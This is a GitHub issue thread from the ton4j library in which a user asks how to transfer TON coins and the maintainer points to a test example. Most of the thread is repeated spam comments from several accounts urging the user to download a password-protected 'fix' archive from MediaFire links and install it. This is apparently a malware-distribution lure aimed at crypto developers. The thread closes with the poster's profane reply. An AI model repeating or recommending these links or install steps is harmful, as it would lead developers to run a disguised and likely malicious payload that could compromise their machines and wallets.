### ISSUE TITLE
anyone can tell me how to transfer ton coin from an address to another

### ISSUE THREAD

**Issue by artistgrammer2015** [neodix42/ton4j#36]
i can find the feature anywhere!!!!

**Comment by neodix42** [comment]
there are many examples, you can start with this one https://github.com/neodix42/ton4j/blob/main/smartcontract/src/test/java/org/ton/java/smartcontract/unittests/TestWalletsV3.java#L145

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by artistgrammer2015** [comment]
fuck ur mother



发自我的iPhone


------------------ Original ------------------
From: goncastrum ***@***.***&gt;
Date: Mon,Sep 2,2024 6:27 AM
To: neodix42/ton4j ***@***.***&gt;
Cc: artistgrammer ***@***.***&gt;, Author ***@***.***&gt;
Subject: Re: [neodix42/ton4j] anyone can tell me how to transfer ton coin froman address to another (Issue #36)





 
hi bro, to fix your trouble try this fix, i see it in another issue,
 https://app.mediafire.com/dqajf1x14ccfd
 password: changeme
 when you installing it, you need to place a check in install to path and select usx
